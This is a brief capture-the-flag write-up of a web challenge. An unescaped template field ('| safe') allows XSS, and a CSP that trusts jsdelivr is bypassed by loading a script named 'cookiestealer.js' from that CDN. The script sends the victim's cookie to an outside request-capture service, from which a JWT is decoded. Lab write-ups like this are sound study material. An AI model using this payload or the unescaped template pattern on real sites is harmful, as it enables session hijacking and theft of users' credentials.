1  Category: #Web 
 2  Rated Difficulty: #VeryEasy 
 3  Personal Difficulty: #Medium 
 4  
 5  I learnt quite a few things on this challenge which are **Content-Security-Policy** and loading malicious script using cdn
 6  
 7  ---
 8  
 9  First you start the page you see a simple form
10  
11  Then you read the code and realise that the username form is not escaped since there is `safe` in the templater
12  ```html
13  <div class="card-header"> <strong>Halloween Name</strong> : {{ request.halloween_name | safe }} </div>
14  ```
15  
16  This would mean we can perform [[Cross-Site Scripting (XSS)]] 
17  Upon checking of the response on submission using [[Burp]] we realised that it have **Content-Security-Policy** header. [Read more](https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html)
18  
19  Then using https://csp-evaluator.withgoogle.com/ we checked the csp policy for vulnerabilities and found that it uses jsdelivr which is a cdn for js
20  
21  We made a jsdelivr js script that send a request to [httpdump](https://httpdump.app) with the cookie.
22  
23  Exploited the [[Cross-Site Scripting (XSS)]] vulnerabilities by making it load the link to the jsdelivr js script.
24  `<script src='https://cdn.jsdelivr.net/gh/gh-username/repo@main/cookiestealer.js'></script>`
25  
26  Get the [[JWT]] token on [httpdump](https://httpdump.app) and decoded it using https://jwt.io